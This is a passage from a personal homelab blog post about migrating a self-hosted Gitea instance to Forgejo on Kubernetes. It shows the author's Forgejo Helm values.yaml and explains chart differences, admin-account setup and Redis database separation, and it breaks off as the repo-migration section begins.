<p>The Git forge <a href="https://about.gitea.com/">Gitea</a> is one of the oldest services
in my Homelab. I set up the first instance about ten years ago, when a budgetary
problem forced me to switch my Homeserver to a Pi 3. And that wasn&rsquo;t really
able to run Gitlab, my previous hosting platform. So Gitea it was. Then I had
another Gitlab phase after those budgetary constraints were decisively lifted.
And then I returned to Gitea, because Gitlab was really, really annoying me,
back in 2021. I have been quite happy with Gitea. It provides me with a nice UI for
my repos and a convenient place for issue logging, although I&rsquo;ve never really
used that feature too much. A couple of years ago, I also added a CI with Drone,
but that&rsquo;s about all the features I ever needed from a Git forge.</p>
<p>Save for statistics. I really like statistics. That was my one gripe about
the switch away from Gitlab - they&rsquo;ve got nice Git statistics. But Gitea at
least has an activity heatmap:
<figure>
    <img loading="lazy" src="heatmap.png"
         alt="A screenshot of a heatmap. It shows the Weeks in columns and the days of the week in rows. It has one box for each day of the past year. Some things of note. First, the map is not entirely filled. There are quite a few unfilled days with no activity. Notably, almost all Saturdays and Sundays show some activity. Fridays are also highly represented. There is also a marked shift throughout the year. During the past July to October, there is very little activity during the work week. This changes rapidly in January, after which there are only relatively few days even during the work week that have no activity."/> <figcaption>
            <p>My Gitea activity heatmap.</p>
        </figcaption>
</figure>

I&rsquo;m always amused that you can see that I finally finished the backup operator
implementation in December and got really going on the rest of the k8s migration
after that. &#x1f601;</p>
<p>But today I want to talk about my switch to <a href="https://forgejo.org/">Forgejo</a>,
which started out as a soft fork of Gitea, but has become a hard fork at this
point. Why? Well, mostly smell? I was pretty surprised when Gitea announced that
they were going a bit more in the corporate direction. Sure, that&rsquo;s fine with me,
and we all need to make money somehow. But after the introduction of Gitea Cloud,
their SaaS offering, it felt just a bit too corporate for my tastes. And then
there was Forgejo, which has a pretty open, community-led process. It&rsquo;s also
got its trademark and domain owned by <a href="https://docs.codeberg.org/getting-started/what-is-codeberg/">Codeberg</a> e.V.,
a German non-profit that&rsquo;s running the Codeberg Git hosting platform - based on
Forgejo. That just has a nice ring to it. In addition, the main development
for Federation of Git forges is happening in Forgejo. And while my Forgejo instance
is not public right now, I might very well make it public once federation arrives.</p>
<p>Before I get to the configuration, one typical Michael thing: I had originally
planned to make the switch as part of migrating Gitea to k8s. I sat down
to start that move on a nice Saturday morning in February. Then I searched around
a bit for information on migrating a Gitea instance to Forgejo. And one of the first hits was
<a href="https://forgejo.org/2025-01-release-v10-0/">this Forgejo release post</a>. It
announced that Gitea 1.22 was the last version where a switch was possible by
just changing the container images. And now guess what I had done the previous
evening&hellip;</p>
<p>So migrating all repos by hand it was.</p>
<h2 id="the-setup">The setup</h2>
<p>I will not say too much about the Forgejo setup itself. It is very similar to
my Gitea setup. In fact, I started by just copying all the manifests and Helm
<code>values.yaml</code> file from my Gitea setup. If you&rsquo;re interested in an in-depth
description, have a look at my <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/">post on migrating Gitea to k8s</a>.</p>
<p>But for completeness&rsquo; sake, here is my <code>values.yaml</code> file for the <a href="https://code.forgejo.org/forgejo-helm/forgejo-helm">Forgejo Helm chart</a>
in version 12.5.0:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rootless</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Recreate</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">containerSecurityContext</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">SYS_CHROOT</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">git.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">forgejo.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">forgejo.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">httpRoute</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">route</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">800m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">2000Mi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mount</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">size</span>: <span style="color:#ae81ff">15Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">signing</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;forgejo-admin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordMode</span>: <span style="color:#ae81ff">initialOnlyRequireReset</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">APP_NAME</span>: <span style="color:#e6db74">&#34;My Forgejo&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RUN_MODE</span>: <span style="color:#e6db74">&#34;prod&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_DOMAIN</span>: <span style="color:#e6db74">&#34;git.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_PORT</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LEVEL</span>: <span style="color:#ae81ff">Info</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DB_TYPE</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LOG_SQL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oauth2</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DISABLE_REGISTRATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">REQUIRE_SIGNIN_VIEW</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_KEEP_EMAIL_PRIVATE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ALLOW_CREATE_ORGANIZATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_VISIBILITY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_MEMBER_VISIBLE</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ENABLE_TIMETRACKING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SHOW_REGISTRATION_BUTTON</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repository</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCRIPT_TYPE</span>: <span style="color:#ae81ff">bash</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_PRIVATE</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_BRANCH</span>: <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379,db=1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_EMAIL_NOTIFICATIONS</span>: <span style="color:#ae81ff">disabled</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openid</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLE_OPENID_SIGNIN</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOWED_HOST_LIST</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mailer</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SUBJECT_PREFIX</span>: <span style="color:#e6db74">&#34;[Forgejo]&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_ADDR</span>: <span style="color:#ae81ff">mail.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_PORT</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">FROM</span>: <span style="color:#e6db74">&#34;forgejo@mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">USER</span>: <span style="color:#e6db74">&#34;apps@mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">time</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_UI_LOCATION</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.archive_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_mirrors</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.repo_health_check</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 30 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TIMEOUT</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.check_repo_stats</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 0 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_migration_poster_id</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.sync_external_users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">UPDATE_EXISTING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.deleted_branches_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">migrations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOW_LOCALNETWORKS</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__USER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__MAILER__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_BUCKET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis-cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql-ha</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>When migrating from Gitea to Forgejo by doing a copy+paste of the <code>values.yaml</code>
for their respective Helm charts, there are a few differences to be taken into
account.</p>
<p>First, all of the environment variables need to be prefixed with <code>FORGEJO</code>
instead of <code>GITEA</code>. Another difference is the way Actions, the CI system, is disabled.
I&rsquo;m running <a href="https://woodpecker-ci.org/">Woodpecker</a> as my CI, so I didn&rsquo;t need
Actions. In the Gitea Helm chart, Actions is disabled like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>In Forgejo, there is no specific Helm value to do so; instead, the Forgejo config
option needs to be set:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>I&rsquo;ve also switched my approach to the admin account config. In Gitea, I already
had an admin account, because I was only migrating from the Nomad setup to k8s.
But for Forgejo, I was creating an entirely fresh instance, so I chose this
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;forgejo-admin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordMode</span>: <span style="color:#ae81ff">initialOnlyRequireReset</span>
</span></span></code></pre></div><p>This creates the <code>forgejo-admin</code> account and sets its initial password to <code>12345</code>.
The <code>initialOnlyRequireReset</code> setting then requires a password reset upon
first login, after which the chart will never touch the password again.</p>
<p>And then, perhaps the most important setting: the Redis connection string. I only
have one Redis instance in my Homelab, so it would be shared between Gitea and
Forgejo, which would need to run in parallel while I was migrating the repos.</p>
<pre tabindex="0"><code>network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180
</code></pre><p>The important piece in this connection string, and in all the others in the <code>values.yaml</code>,
is the <code>db=1</code> setting at the end. My Gitea chart had that set to <code>db=0</code>. And so
did my Forgejo instance during the entire migration. This had some frustrating/funny
consequences I will describe later.</p>
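<p>To make the difference concrete, here is a minimal sketch of how the queue sections of the two
charts should have looked from the start (the cache and session sections need the same treatment).
The only thing separating the two instances is the <code>db=</code> number at the end of the
connection string, which uses the same format as in the <code>values.yaml</code> above:</p>
<pre tabindex="0"><code># Gitea values.yaml - stays on Redis DB 0
gitea:
  config:
    queue:
      TYPE: redis
      CONN_STR: &#34;addr=redis.redis.svc.cluster.local:6379,db=0&#34;
---
# Forgejo values.yaml - moved to Redis DB 1
gitea:
  config:
    queue:
      TYPE: redis
      CONN_STR: &#34;addr=redis.redis.svc.cluster.local:6379,db=1&#34;
</code></pre>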
<p>And that&rsquo;s really already it. All of the other settings are the same as for my
Gitea instance and are described in detail in the previous post I linked above.</p>
<h2 id="repo-migration">Repo migration</h2>
<p>At this point, I had Gitea and Forgejo running in parallel in the cluster. The
main thing left was to migrate the repositories. Luckily, Forgejo can import
repositories from Gitea. For that, I needed to provide an API token for Gitea
